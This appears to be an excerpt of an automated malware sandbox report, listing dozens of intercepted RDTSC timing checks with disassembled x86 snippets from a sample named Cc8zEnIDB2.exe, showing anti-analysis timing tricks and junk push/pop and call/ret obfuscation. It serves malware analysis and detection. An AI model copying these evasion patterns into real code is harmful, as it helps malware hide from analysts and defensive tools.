Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C854CE second address: C854D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C854D4 second address: C854E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F43E91C545Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C854E9 second address: C8550E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F43E8C1FDD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85D66 second address: C85D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F43E91C5456h 0x0000000a jns 00007F43E91C5456h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85D76 second address: C85D9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F43E8C1FDE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F43E8C1FDDDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85D9D second address: C85DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85EDC second address: C85EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85EE2 second address: C85EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C85EE6 second address: C85F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43E8C1FDE5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F43E8C1FDD6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8602B second address: C8602F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8602F second address: C86041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8646F second address: C86474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C86474 second address: C8647F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F43E8C1FDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8AD35 second address: C8AD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8AD3B second address: C8AD3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8B1DE second address: C8B1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8B4B5 second address: C8B4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8B4B9 second address: C8B4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C8B4CF second address: C8B4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C913CE second address: C913D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C913D7 second address: C913E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C916A9 second address: C916AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C916AD second address: C916B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C916B3 second address: C916C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F43E91C545Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9180C second address: C91821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C91821 second address: C9182D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E91C545Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9182D second address: C91839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C91839 second address: C9183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9183D second address: C91849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C91849 second address: C91853 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43E91C545Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C92BF6 second address: C92C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C92D04 second address: C92D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43E91C545Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C92D1F second address: C92D2C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43E8C1FDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9330A second address: C93311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93311 second address: C9334B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F43E8C1FDDCh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F43E8C1FDDBh 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F43E8C1FDE7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9334B second address: C93368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F43E91C5456h 0x00000009 ja 00007F43E91C5456h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F43E91C5458h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93368 second address: C93382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C934E3 second address: C934E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C935A8 second address: C935BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93761 second address: C93765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93765 second address: C9377F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F43E8C1FDE8h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F43E8C1FDD6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93DA9 second address: C93DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F43E91C5456h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93DBB second address: C93DC5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43E8C1FDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93DC5 second address: C93DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C93DCA second address: C93E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 or dword ptr [ebp+122D1C28h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F43E8C1FDD8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a jp 00007F43E8C1FDDCh 0x00000030 mov edi, dword ptr [ebp+122D19CEh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F43E8C1FDD8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov edi, eax 0x00000054 jbe 00007F43E8C1FDDBh 0x0000005a and di, 6200h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push ebx 0x00000063 jo 00007F43E8C1FDD6h 0x00000069 pop ebx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C94894 second address: C9489A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9489A second address: C948B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C948B1 second address: C948B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C957D9 second address: C957DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C96C8C second address: C96C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C96C92 second address: C96C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C97763 second address: C97767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C97767 second address: C9776D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98FAB second address: C98FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98FAF second address: C98FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98FB4 second address: C98FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5460h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98FD1 second address: C98FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43E8C1FDE1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98D43 second address: C98D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F43E91C5468h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9AC2D second address: C9AC45 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43E8C1FDD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F43E8C1FDDCh 0x00000012 jbe 00007F43E8C1FDD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9DA74 second address: C9DA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F43E91C5456h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jnc 00007F43E91C545Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9DA8C second address: C9DA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9DA94 second address: C9DA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9F909 second address: C9F90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9F90E second address: C9F91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9E9E0 second address: C9E9F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43E8C1FDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d ja 00007F43E8C1FDD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA0901 second address: CA090B instructions: 0x00000000 rdtsc 0x00000002 je 00007F43E91C545Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA090B second address: CA091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F43E8C1FDD8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA091C second address: CA099E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F43E91C5458h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F43E91C5458h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 call 00007F43E91C545Eh 0x00000045 mov dword ptr [ebp+12472CE9h], edi 0x0000004b pop edi 0x0000004c push 00000000h 0x0000004e mov ebx, 769CCC4Ch 0x00000053 push eax 0x00000054 push edi 0x00000055 push eax 0x00000056 push edx 0x00000057 jnl 00007F43E91C5456h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9FA2F second address: C9FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9FA33 second address: C9FAE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F43E91C5458h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F43E91C5458h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+124454D6h], eax 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov dword ptr [ebp+124668C0h], esi 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov di, E601h 0x0000004b mov dword ptr [ebp+122D354Bh], eax 0x00000051 mov eax, dword ptr [ebp+122D066Dh] 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007F43E91C5458h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 00000015h 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 mov edi, esi 0x00000073 jnl 00007F43E91C545Ch 0x00000079 push FFFFFFFFh 0x0000007b clc 0x0000007c nop 0x0000007d push eax 0x0000007e pushad 0x0000007f jmp 00007F43E91C5465h 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9FAE0 second address: C9FAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA18FA second address: CA19A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F43E91C5467h 0x0000000f jno 00007F43E91C545Ch 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F43E91C5458h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push edi 0x00000033 mov dword ptr [ebp+122D1C28h], eax 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F43E91C5458h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 or edi, dword ptr [ebp+122D28C3h] 0x0000005c xchg eax, esi 0x0000005d jno 00007F43E91C545Eh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jnl 00007F43E91C546Bh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA19A9 second address: CA19AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA19AF second address: CA19B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA1C22 second address: CA1C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA1C26 second address: CA1C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA37CE second address: CA384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F43E8C1FDDFh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F43E8C1FDD8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 movsx edi, cx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F43E8C1FDD8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D326Fh], ebx 0x0000004b push 00000000h 0x0000004d mov ebx, dword ptr [ebp+122D2B63h] 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F43E8C1FDE2h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA384F second address: CA385A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F43E91C5456h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA385A second address: CA3876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43E8C1FDE0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA3876 second address: CA387A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA387A second address: CA3880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
